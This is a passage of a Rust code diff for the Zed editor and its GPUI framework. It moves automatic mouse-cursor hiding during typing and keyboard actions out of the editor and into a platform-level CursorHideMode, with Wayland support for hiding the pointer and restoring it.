self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_with(&mut |map, selection| { selection.collapse_to( @@ -15981,7 +15846,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -16002,7 +15866,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -16023,7 +15886,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -16044,7 +15906,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_heads_with(&mut |map, head, _| { ( @@ -16065,7 +15926,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.select_ranges(vec![Anchor::Min..Anchor::Min]); }); @@ -16079,7 +15939,6 @@ impl Editor { ) { let mut selection = self.selections.last::(&self.display_snapshot(cx)); selection.set_head(Point::zero(), SelectionGoal::None); - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.select(vec![selection]); }); @@ -16090,7 +15949,6 @@ impl Editor { cx.propagate(); return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let cursor = self.buffer.read(cx).read(cx).len(); self.change_selections(Default::default(), window, cx, |s| { s.select_ranges(vec![cursor..cursor]) @@ 
-16179,7 +16037,6 @@ impl Editor { } pub fn select_to_end(&mut self, _: &SelectToEnd, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); let mut selection = self .selections @@ -16191,14 +16048,12 @@ impl Editor { } pub fn select_all(&mut self, _: &SelectAll, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { s.select_ranges(vec![Anchor::Min..Anchor::Max]); }); } pub fn select_line(&mut self, _: &SelectLine, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let mut selections = self.selections.all::(&display_map); let max_point = display_map.buffer_snapshot().max_point(); @@ -16297,8 +16152,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let all_selections = self.selections.all::(&display_map); let text_layout_details = self.text_layout_details(window, cx); @@ -16720,8 +16573,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Result<()> { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); self.select_next_match_internal(&display_map, false, None, window, cx)?; @@ -16787,7 +16638,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Result<()> { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); self.select_next_match_internal( &display_map, @@ -16804,7 +16654,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) -> Result<()> { - 
self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = display_map.buffer_snapshot(); let mut selections = self.selections.all::(&display_map); @@ -17011,7 +16860,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, _window, cx| { let mut selections = this .selections @@ -17202,7 +17050,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let text_layout_details = &self.text_layout_details(window, cx); self.transact(window, cx, |this, window, cx| { let mut selections = this @@ -17505,8 +17352,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let buffer = self.buffer.read(cx).snapshot(cx); let old_selections = self .selections @@ -17574,8 +17419,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = self.buffer.read(cx).snapshot(cx); @@ -17691,8 +17534,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - if let Some((mut selections, scroll_behavior, is_selection_reversed)) = self.select_syntax_node_history.pop() { @@ -17735,7 +17576,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let buffer = self.buffer.read(cx).snapshot(cx); let selections = self @@ -17817,8 +17657,6 @@ impl Editor { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let buffer = self.buffer.read(cx).snapshot(cx); let mut selected_sibling = false; @@ -17877,8 +17715,6 @@ impl Editor { ) { let old_selections: Arc<[_]> = 
self.selections.all_anchors(&self.display_snapshot(cx)); - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let multibuffer_snapshot = self.buffer.read(cx).snapshot(cx); let mut selected_sibling = false; @@ -18017,8 +17853,6 @@ impl Editor { return false; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = self.buffer.read(cx).snapshot(cx); @@ -18082,8 +17916,6 @@ impl Editor { cx: &mut Context, move_to_end: bool, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); - let display_map = self.display_map.update(cx, |map, cx| map.snapshot(cx)); let buffer = self.buffer.read(cx).snapshot(cx); let old_selections = self.selections.all::(&display_map); @@ -18115,7 +17947,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.change_selections(Default::default(), window, cx, |s| { s.move_offsets_with(&mut |snapshot, selection| { let Some(enclosing_bracket_ranges) = @@ -18172,7 +18003,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); if let Some(entry) = self.selection_history.undo_stack.pop_back() { self.selection_history.mode = SelectionHistoryMode::Undoing; self.with_selection_effects_deferred(window, cx, |this, window, cx| { @@ -18198,7 +18028,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); if let Some(entry) = self.selection_history.redo_stack.pop_back() { self.selection_history.mode = SelectionHistoryMode::Redoing; self.with_selection_effects_deferred(window, cx, |this, window, cx| { @@ -18386,7 +18215,6 @@ impl Editor { if !self.diagnostics_enabled() { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.go_to_diagnostic_impl(Direction::Next, 
action.severity, window, cx) } @@ -18399,7 +18227,6 @@ impl Editor { if !self.diagnostics_enabled() { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); self.go_to_diagnostic_impl(Direction::Prev, action.severity, window, cx) } @@ -18497,7 +18324,6 @@ impl Editor { } pub fn go_to_next_hunk(&mut self, _: &GoToHunk, window: &mut Window, cx: &mut Context) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let snapshot = self.snapshot(window, cx); let selection = self.selections.newest::(&self.display_snapshot(cx)); self.go_to_hunk_before_or_after_position( @@ -18566,7 +18392,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let snapshot = self.snapshot(window, cx); let selection = self.selections.newest::(&snapshot.display_snapshot); self.go_to_hunk_before_or_after_position( @@ -18660,7 +18485,6 @@ impl Editor { window: &mut Window, cx: &mut Context, ) { - self.hide_mouse_cursor(HideMouseCursorOrigin::MovementAction, cx); let snapshot = self.snapshot(window, cx); let buffer = &snapshot.buffer_snapshot(); let position = self @@ -20180,7 +20004,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { Some(project) => project.clone(), @@ -20205,7 +20028,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { Some(project) => project.clone(), @@ -20327,7 +20149,6 @@ impl Editor { if self.read_only(cx) { return None; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let project = match &self.project { Some(project) => project.clone(), None => return None, @@ -21911,7 +21732,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let buffers = 
self.buffer.read(cx).all_buffers(); for branch_buffer in buffers { @@ -21944,7 +21764,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); let snapshot = self.snapshot(window, cx); let hunks = snapshot.hunks_for_ranges( self.selections @@ -24284,7 +24103,6 @@ impl Editor { if self.read_only(cx) { return; } - self.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); self.transact(window, cx, |this, window, cx| { let edits = this .selections @@ -25363,7 +25181,6 @@ impl Editor { self.scroll_manager.vertical_scroll_margin = editor_settings.vertical_scroll_margin; self.show_breadcrumbs = editor_settings.toolbar.breadcrumbs; self.cursor_shape = editor_settings.cursor_shape.unwrap_or_default(); - self.hide_mouse_mode = editor_settings.hide_mouse.unwrap_or_default(); } if old_cursor_shape != self.cursor_shape { @@ -26021,8 +25838,8 @@ impl Editor { } }); - if let Some(position_map) = self.last_position_map.clone() - && !self.mouse_cursor_hidden + if cx.is_cursor_visible() + && let Some(position_map) = self.last_position_map.clone() { EditorElement::mouse_moved( self, diff --git a/crates/editor/src/editor_settings.rs b/crates/editor/src/editor_settings.rs index 1999d0e537e525..0c39196062b08a 100644 --- a/crates/editor/src/editor_settings.rs +++ b/crates/editor/src/editor_settings.rs @@ -6,9 +6,8 @@ use project::project_settings::DiagnosticSeverity; pub use settings::{ CodeLens, CompletionDetailAlignment, CurrentLineHighlight, DelayMs, DiffViewStyle, DisplayIn, DocumentColorsRenderMode, DoubleClickInMultibuffer, GoToDefinitionFallback, - GoToDefinitionScrollStrategy, HideMouseMode, MinimapThumb, MinimapThumbBorder, - MultiCursorModifier, ScrollBeyondLastLine, ScrollbarDiagnostics, SeedQuerySetting, ShowMinimap, - SnippetSortOrder, + GoToDefinitionScrollStrategy, MinimapThumb, MinimapThumbBorder, MultiCursorModifier, + ScrollBeyondLastLine, ScrollbarDiagnostics, SeedQuerySetting, ShowMinimap, 
SnippetSortOrder, }; use settings::{RegisterSetting, RelativeLineNumbers, Settings}; use ui::scrollbars::ShowScrollbar; @@ -55,7 +54,6 @@ pub struct EditorSettings { pub go_to_definition_fallback: GoToDefinitionFallback, pub go_to_definition_scroll_strategy: GoToDefinitionScrollStrategy, pub jupyter: Jupyter, - pub hide_mouse: Option, pub snippet_sort_order: SnippetSortOrder, pub diagnostics_max_severity: Option, pub inline_code_actions: bool, @@ -291,7 +289,6 @@ impl Settings for EditorSettings { jupyter: Jupyter { enabled: editor.jupyter.unwrap().enabled.unwrap(), }, - hide_mouse: editor.hide_mouse, snippet_sort_order: editor.snippet_sort_order.unwrap(), diagnostics_max_severity: editor.diagnostics_max_severity.map(Into::into), inline_code_actions: editor.inline_code_actions.unwrap(), diff --git a/crates/editor/src/element.rs b/crates/editor/src/element.rs index 69a829e578b45f..a8c0d443d7e0cf 100644 --- a/crates/editor/src/element.rs +++ b/crates/editor/src/element.rs @@ -1262,7 +1262,6 @@ impl EditorElement { let text_hovered = text_hitbox.is_hovered(window); let gutter_hovered = gutter_hitbox.is_hovered(window); editor.set_gutter_hovered(gutter_hovered, cx); - editor.show_mouse_cursor(cx); let point_for_position = position_map.point_for_position(event.position); let valid_point = point_for_position.nearest_valid; @@ -6607,9 +6606,7 @@ impl EditorElement { }), |window| { let editor = self.editor.read(cx); - if editor.mouse_cursor_hidden { - window.set_window_cursor_style(CursorStyle::None); - } else if let SelectionDragState::ReadyToDrag { + if let SelectionDragState::ReadyToDrag { mouse_down_time, .. 
} = &editor.selection_drag_state { diff --git a/crates/editor/src/hover_links.rs b/crates/editor/src/hover_links.rs index e00fd20ed5abdc..1877d8704f6a7b 100644 --- a/crates/editor/src/hover_links.rs +++ b/crates/editor/src/hover_links.rs @@ -120,7 +120,12 @@ impl Editor { cx: &mut Context, ) { let hovered_link_modifier = Editor::is_cmd_or_ctrl_pressed(&modifiers, cx); - if !hovered_link_modifier || self.has_pending_selection() || self.mouse_cursor_hidden { + if !hovered_link_modifier || self.has_pending_selection() { + self.hide_hovered_link(cx); + return; + } + + if !cx.is_cursor_visible() { self.hide_hovered_link(cx); return; } @@ -782,7 +787,7 @@ fn surrounding_filename( mod tests { use super::*; use crate::{ - DisplayPoint, HideMouseCursorOrigin, + DisplayPoint, display_map::ToDisplayPoint, editor_tests::init_test, inlays::inlay_hints::tests::{cached_hint_labels, visible_hint_labels}, @@ -1413,29 +1418,6 @@ mod tests { Let's test a [complex](«https://zed.dev/channel/ˇ») case. "}, ); - - // Cursor hidden with secondary key - let screen_coord = cx.pixel_position(indoc! {" - Let's test a [complex](https://zed.dev/ˇchannel/) case. - "}); - cx.simulate_mouse_move(screen_coord, None, Modifiers::none()); - cx.update_editor(|editor, _, cx| { - editor.hide_mouse_cursor(HideMouseCursorOrigin::TypingAction, cx); - }); - cx.simulate_modifiers_change(Modifiers::secondary_key()); - assert_no_highlight!(cx); - - // Cursor active again - let screen_coord = cx.pixel_position(indoc! {" - Let's test a [complex](https://ˇzed.dev/channel/) case. - "}); - cx.simulate_mouse_move(screen_coord, None, Modifiers::secondary_key()); - cx.assert_editor_text_highlights( - HighlightKey::HoveredLinkState, - indoc! {" - Let's test a [complex](«https://zed.dev/channel/ˇ») case. 
- "}, - ); } #[gpui::test] diff --git a/crates/gpui/src/app.rs b/crates/gpui/src/app.rs index f19c780caa671d..a9255898daa526 100644 --- a/crates/gpui/src/app.rs +++ b/crates/gpui/src/app.rs @@ -257,6 +257,22 @@ pub enum QuitMode { Explicit, } +/// Controls when GPUI hides the mouse cursor in response to keyboard input. +/// +/// Restoration on mouse motion is handled by the platform layer; this enum +/// only describes the policy for *triggering* a hide. +#[derive(Copy, Clone, Debug, Default, PartialEq, Eq)] +pub enum CursorHideMode { + /// Never hide the cursor automatically. + Never, + /// Hide on character-producing key presses (typing). + OnTyping, + /// Hide on character-producing key presses, *and* when a key binding + /// resolves to an action that consumes the keystroke. + #[default] + OnTypingAndAction, +} + #[doc(hidden)] #[derive(Clone, PartialEq, Eq)] pub struct SystemWindowTab { @@ -649,6 +665,7 @@ pub struct App { pub(crate) window_update_stack: Vec, pub(crate) mode: GpuiMode, + pub(crate) cursor_hide_mode: CursorHideMode, flushing_effects: bool, pending_updates: usize, quit_mode: QuitMode, @@ -737,6 +754,7 @@ impl App { inspector_element_registry: InspectorElementRegistry::default(), quit_mode: QuitMode::default(), quitting: false, + cursor_hide_mode: CursorHideMode::default(), #[cfg(any(test, feature = "test-support", debug_assertions))] name: None, @@ -877,6 +895,27 @@ impl App { self.platform.quit(); } + /// Returns the current policy for hiding the cursor in response to + /// keyboard input. + pub fn cursor_hide_mode(&self) -> CursorHideMode { + self.cursor_hide_mode + } + + /// Sets the policy controlling when GPUI hides the cursor in response + /// to keyboard input. + pub fn set_cursor_hide_mode(&mut self, mode: CursorHideMode) { + self.cursor_hide_mode = mode; + } + + /// Returns whether the cursor is currently visible according to the + /// platform. 
This will report `false` after a keyboard input has hidden + /// the cursor and the user has not yet moved the mouse to restore it. + /// + /// See [`App::set_cursor_hide_mode`]. + pub fn is_cursor_visible(&self) -> bool { + self.platform.is_cursor_visible() + } + /// Schedules all windows in the application to be redrawn. This can be called /// multiple times in an update cycle and still result in a single redraw. pub fn refresh_windows(&mut self) { diff --git a/crates/gpui/src/platform.rs b/crates/gpui/src/platform.rs index ac36f05c425d6a..a00d158bc51704 100644 --- a/crates/gpui/src/platform.rs +++ b/crates/gpui/src/platform.rs @@ -212,6 +212,14 @@ pub trait Platform: 'static { fn path_for_auxiliary_executable(&self, name: &str) -> Result; fn set_cursor_style(&self, style: CursorStyle); + + /// Hides the mouse cursor until the user moves the mouse over one of + /// this application's windows. + fn hide_cursor_until_mouse_moves(&self); + + /// Returns whether the mouse cursor is currently visible. 
+ fn is_cursor_visible(&self) -> bool; + fn should_auto_hide_scrollbars(&self) -> bool; fn read_from_clipboard(&self) -> Option; @@ -1818,9 +1826,6 @@ pub enum CursorStyle { /// A cursor indicating that the operation will result in a context menu /// corresponds to the CSS cursor value `context-menu` ContextualMenu, - - /// Hide the cursor - None, } /// A clipboard item that should be copied to the clipboard diff --git a/crates/gpui/src/platform/test/platform.rs b/crates/gpui/src/platform/test/platform.rs index a59b21f038a01b..cc8c5749bd4696 100644 --- a/crates/gpui/src/platform/test/platform.rs +++ b/crates/gpui/src/platform/test/platform.rs @@ -403,6 +403,12 @@ impl Platform for TestPlatform { *self.active_cursor.lock() = style; } + fn hide_cursor_until_mouse_moves(&self) {} + + fn is_cursor_visible(&self) -> bool { + true + } + fn should_auto_hide_scrollbars(&self) -> bool { false } diff --git a/crates/gpui/src/platform/visual_test.rs b/crates/gpui/src/platform/visual_test.rs index 8b9bec7edd170b..3719a3ee24f9eb 100644 --- a/crates/gpui/src/platform/visual_test.rs +++ b/crates/gpui/src/platform/visual_test.rs @@ -202,6 +202,14 @@ impl Platform for VisualTestPlatform { self.platform.set_cursor_style(style) } + fn hide_cursor_until_mouse_moves(&self) { + self.platform.hide_cursor_until_mouse_moves(); + } + + fn is_cursor_visible(&self) -> bool { + self.platform.is_cursor_visible() + } + fn should_auto_hide_scrollbars(&self) -> bool { self.platform.should_auto_hide_scrollbars() } diff --git a/crates/gpui/src/window.rs b/crates/gpui/src/window.rs index ad8bb0f735d5d4..dc387c67f39817 100644 --- a/crates/gpui/src/window.rs +++ b/crates/gpui/src/window.rs @@ -3,21 +3,22 @@ use crate::Inspector; use crate::{ Action, AnyDrag, AnyElement, AnyImageCache, AnyTooltip, AnyView, App, AppContext, Arena, Asset, AsyncWindowContext, AvailableSpace, Background, BorderStyle, Bounds, BoxShadow, Capslock, - Context, Corners, CursorStyle, Decorations, DevicePixels, 
DispatchActionListener, - DispatchNodeId, DispatchTree, DisplayId, Edges, Effect, Entity, EntityId, EventEmitter, - FileDropEvent, FontId, Global, GlobalElementId, GlyphId, GpuSpecs, Hsla, InputHandler, IsZero, - KeyBinding, KeyContext, KeyDownEvent, KeyEvent, Keystroke, KeystrokeEvent, LayoutId, - LineLayoutIndex, Modifiers, ModifiersChangedEvent, MonochromeSprite, MouseButton, MouseEvent, - MouseMoveEvent, MouseUpEvent, Path, Pixels, PlatformAtlas, PlatformDisplay, PlatformInput, - PlatformInputHandler, PlatformWindow, Point, PolychromeSprite, Priority, PromptButton, - PromptLevel, Quad, Render, RenderGlyphParams, RenderImage, RenderImageParams, RenderSvgParams, - Replay, ResizeEdge, SMOOTH_SVG_SCALE_FACTOR, SUBPIXEL_VARIANTS_X, SUBPIXEL_VARIANTS_Y, - ScaledPixels, Scene, Shadow, SharedString, Size, StrikethroughStyle, Style, SubpixelSprite, - SubscriberSet, Subscription, SystemWindowTab, SystemWindowTabController, TabStopMap, - TaffyLayoutEngine, Task, TextRenderingMode, TextStyle, TextStyleRefinement, ThermalState, - TransformationMatrix, Underline, UnderlineStyle, WindowAppearance, WindowBackgroundAppearance, - WindowBounds, WindowControls, WindowDecorations, WindowOptions, WindowParams, WindowTextSystem, - point, prelude::*, px, rems, size, transparent_black, + Context, Corners, CursorHideMode, CursorStyle, Decorations, DevicePixels, + DispatchActionListener, DispatchNodeId, DispatchTree, DisplayId, Edges, Effect, Entity, + EntityId, EventEmitter, FileDropEvent, FontId, Global, GlobalElementId, GlyphId, GpuSpecs, + Hsla, InputHandler, IsZero, KeyBinding, KeyContext, KeyDownEvent, KeyEvent, Keystroke, + KeystrokeEvent, LayoutId, LineLayoutIndex, Modifiers, ModifiersChangedEvent, MonochromeSprite, + MouseButton, MouseEvent, MouseMoveEvent, MouseUpEvent, Path, Pixels, PlatformAtlas, + PlatformDisplay, PlatformInput, PlatformInputHandler, PlatformWindow, Point, PolychromeSprite, + Priority, PromptButton, PromptLevel, Quad, Render, RenderGlyphParams, RenderImage, 
+ RenderImageParams, RenderSvgParams, Replay, ResizeEdge, SMOOTH_SVG_SCALE_FACTOR, + SUBPIXEL_VARIANTS_X, SUBPIXEL_VARIANTS_Y, ScaledPixels, Scene, Shadow, SharedString, Size, + StrikethroughStyle, Style, SubpixelSprite, SubscriberSet, Subscription, SystemWindowTab, + SystemWindowTabController, TabStopMap, TaffyLayoutEngine, Task, TextRenderingMode, TextStyle, + TextStyleRefinement, ThermalState, TransformationMatrix, Underline, UnderlineStyle, + WindowAppearance, WindowBackgroundAppearance, WindowBounds, WindowControls, WindowDecorations, + WindowOptions, WindowParams, WindowTextSystem, point, prelude::*, px, rems, size, + transparent_black, }; use anyhow::{Context as _, Result, anyhow}; use collections::{FxHashMap, FxHashSet}; @@ -1457,10 +1458,6 @@ impl Window { move |active| { handle .update(&mut cx, |_, window, cx| { - if !active { - cx.platform.set_cursor_style(CursorStyle::Arrow); - } - window.active.set(active); window.modifiers = window.platform_window.modifiers(); window.capslock = window.platform_window.capslock(); @@ -4473,6 +4470,14 @@ impl Window { } else if let Some(key_down_event) = event.downcast_ref::() { self.pending_modifier.saw_keystroke = true; keystroke = Some(key_down_event.keystroke.clone()); + if key_down_event.keystroke.key_char.is_some() + && matches!( + cx.cursor_hide_mode, + CursorHideMode::OnTyping | CursorHideMode::OnTypingAndAction + ) + { + cx.platform.hide_cursor_until_mouse_moves(); + } } let Some(keystroke) = keystroke else { @@ -4738,6 +4743,22 @@ impl Window { node_id: DispatchNodeId, action: &dyn Action, cx: &mut App, + ) { + self.dispatch_action_on_node_inner(node_id, action, cx); + + if !cx.propagate_event + && cx.cursor_hide_mode == CursorHideMode::OnTypingAndAction + && self.last_input_was_keyboard() + { + cx.platform.hide_cursor_until_mouse_moves(); + } + } + + fn dispatch_action_on_node_inner( + &mut self, + node_id: DispatchNodeId, + action: &dyn Action, + cx: &mut App, ) { let dispatch_path = 
self.rendered_frame.dispatch_tree.dispatch_path(node_id); diff --git a/crates/gpui_linux/src/linux/platform.rs b/crates/gpui_linux/src/linux/platform.rs index e3c947bcb9d333..343600cd862f45 100644 --- a/crates/gpui_linux/src/linux/platform.rs +++ b/crates/gpui_linux/src/linux/platform.rs @@ -80,6 +80,10 @@ pub(crate) trait LinuxClient { options: WindowParams, ) -> anyhow::Result>; fn set_cursor_style(&self, style: CursorStyle); + fn hide_cursor_until_mouse_moves(&self) {} + fn is_cursor_visible(&self) -> bool { + true + } fn open_uri(&self, uri: &str); fn reveal_path(&self, path: PathBuf); fn write_to_primary(&self, item: ClipboardItem); @@ -530,6 +534,14 @@ impl Platform for LinuxPlatform

{ self.inner.set_cursor_style(style) } + fn hide_cursor_until_mouse_moves(&self) { + self.inner.hide_cursor_until_mouse_moves() + } + + fn is_cursor_visible(&self) -> bool { + self.inner.is_cursor_visible() + } + fn should_auto_hide_scrollbars(&self) -> bool { self.inner.with_common(|common| common.auto_hide_scrollbars) } @@ -776,12 +788,6 @@ pub(super) fn cursor_style_to_icon_names(style: CursorStyle) -> &'static [&'stat CursorStyle::DragLink => &["alias"], CursorStyle::DragCopy => &["copy"], CursorStyle::ContextualMenu => &["context-menu"], - CursorStyle::None => { - #[cfg(debug_assertions)] - panic!("CursorStyle::None should be handled separately in the client"); - #[cfg(not(debug_assertions))] - &[DEFAULT_CURSOR_ICON_NAME] - } } } diff --git a/crates/gpui_linux/src/linux/wayland.rs b/crates/gpui_linux/src/linux/wayland.rs index aa1e7974043419..3e90688d1bd98b 100644 --- a/crates/gpui_linux/src/linux/wayland.rs +++ b/crates/gpui_linux/src/linux/wayland.rs @@ -37,11 +37,5 @@ pub(super) fn to_shape(style: CursorStyle) -> Shape { CursorStyle::DragLink => Shape::Alias, CursorStyle::DragCopy => Shape::Copy, CursorStyle::ContextualMenu => Shape::ContextMenu, - CursorStyle::None => { - #[cfg(debug_assertions)] - panic!("CursorStyle::None should be handled separately in the client"); - #[cfg(not(debug_assertions))] - Shape::Default - } } } diff --git a/crates/gpui_linux/src/linux/wayland/client.rs b/crates/gpui_linux/src/linux/wayland/client.rs index f91efa53e8d391..5edd9477b33878 100644 --- a/crates/gpui_linux/src/linux/wayland/client.rs +++ b/crates/gpui_linux/src/linux/wayland/client.rs @@ -256,6 +256,7 @@ pub(crate) struct WaylandClientState { keyboard_focused_window: Option, loop_handle: LoopHandle<'static, WaylandClientStatePtr>, cursor_style: Option, + cursor_hidden_window: Option, clipboard: Clipboard, data_offers: Vec>, primary_data_offer: Option>, @@ -410,6 +411,65 @@ impl WaylandClientStatePtr { { state.keyboard_focused_window = Some(window); } + if let 
Some(window) = state.cursor_hidden_window.take() + && !window.ptr_eq(&closed_window) + { + state.cursor_hidden_window = Some(window); + } + } +} + +impl WaylandClientState { + fn hide_cursor_until_mouse_moves(&mut self) { + if self.cursor_hidden_window.is_some() { + return; + } + let Some(focused_window) = self.mouse_focused_window.clone() else { + // No surface to apply the hidden cursor to. + return; + }; + let Some(wl_pointer) = self.wl_pointer.clone() else { + // Seat lost its pointer capability; nothing to hide. + return; + }; + let serial = self.serial_tracker.get(SerialKind::MouseEnter); + wl_pointer.set_cursor(serial, None, 0, 0); + self.cursor_hidden_window = Some(focused_window); + } + + fn restore_cursor_after_hide(&mut self) { + if self.cursor_hidden_window.take().is_none() { + return; + } + let Some(style) = self.cursor_style else { + return; + }; + let serial = self.serial_tracker.get(SerialKind::MouseEnter); + if let Some(cursor_shape_device) = &self.cursor_shape_device { + cursor_shape_device.set_shape(serial, to_shape(style)); + return; + } + let Some(focused_window) = self.mouse_focused_window.clone() else { + log::warn!( + "wayland: no focused surface to restore cursor style {:?} after hide; cursor may stay invisible", + style + ); + return; + }; + let Some(wl_pointer) = self.wl_pointer.clone() else { + log::warn!( + "wayland: no wl_pointer to restore cursor style {:?} after hide; cursor may stay invisible", + style + ); + return; + }; + let scale = focused_window.primary_output_scale(); + self.cursor.set_icon( + &wl_pointer, + serial, + cursor_style_to_icon_names(style), + scale, + ); } } @@ -665,6 +725,7 @@ impl WaylandClient { loop_handle: handle.clone(), enter_token: None, cursor_style: None, + cursor_hidden_window: None, clipboard: Clipboard::new(conn.clone(), handle.clone()), data_offers: Vec::new(), primary_data_offer: None, @@ -785,35 +846,44 @@ impl LinuxClient for WaylandClient { .as_ref() .is_some_and(|w| !w.is_blocked())); - if 
need_update { - let serial = state.serial_tracker.get(SerialKind::MouseEnter); - state.cursor_style = Some(style); - - if let CursorStyle::None = style { - let wl_pointer = state - .wl_pointer - .clone() - .expect("window is focused by pointer"); - wl_pointer.set_cursor(serial, None, 0, 0); - } else if let Some(cursor_shape_device) = &state.cursor_shape_device { - cursor_shape_device.set_shape(serial, to_shape(style)); - } else if let Some(focused_window) = &state.mouse_focused_window { - // cursor-shape-v1 isn't supported, set the cursor using a surface. - let wl_pointer = state - .wl_pointer - .clone() - .expect("window is focused by pointer"); - let scale = focused_window.primary_output_scale(); - state.cursor.set_icon( - &wl_pointer, - serial, - cursor_style_to_icon_names(style), - scale, - ); - } + if !need_update { + return; + } + + state.cursor_style = Some(style); + + // Don't clobber the invisible cursor; restore reads back from `cursor_style`. + if state.cursor_hidden_window.is_some() { + return; + } + + let serial = state.serial_tracker.get(SerialKind::MouseEnter); + if let Some(cursor_shape_device) = &state.cursor_shape_device { + cursor_shape_device.set_shape(serial, to_shape(style)); + } else if let Some(focused_window) = &state.mouse_focused_window { + // cursor-shape-v1 isn't supported, set the cursor using a surface. 
+ let wl_pointer = state + .wl_pointer + .clone() + .expect("window is focused by pointer"); + let scale = focused_window.primary_output_scale(); + state.cursor.set_icon( + &wl_pointer, + serial, + cursor_style_to_icon_names(style), + scale, + ); } } + fn hide_cursor_until_mouse_moves(&self) { + self.0.borrow_mut().hide_cursor_until_mouse_moves(); + } + + fn is_cursor_visible(&self) -> bool { + self.0.borrow().cursor_hidden_window.is_none() + } + fn open_uri(&self, uri: &str) { let mut state = self.0.borrow_mut(); if let (Some(activation), Some(window)) = ( @@ -1432,6 +1502,7 @@ impl Dispatch for WaylandClientStatePtr { state.enter_token.take(); // Prevent keyboard events from repeating after opening e.g. a file chooser and closing it quickly state.repeat.current_id += 1; + state.restore_cursor_after_hide(); if let Some(window) = keyboard_focused_window { if let Some(ref mut compose) = state.compose_state { @@ -1732,14 +1803,9 @@ impl Dispatch for WaylandClientStatePtr { if state.enter_token.is_some() { state.enter_token = None; } + state.restore_cursor_after_hide(); if let Some(style) = state.cursor_style { - if let CursorStyle::None = style { - let wl_pointer = state - .wl_pointer - .clone() - .expect("window is focused by pointer"); - wl_pointer.set_cursor(serial, None, 0, 0); - } else if let 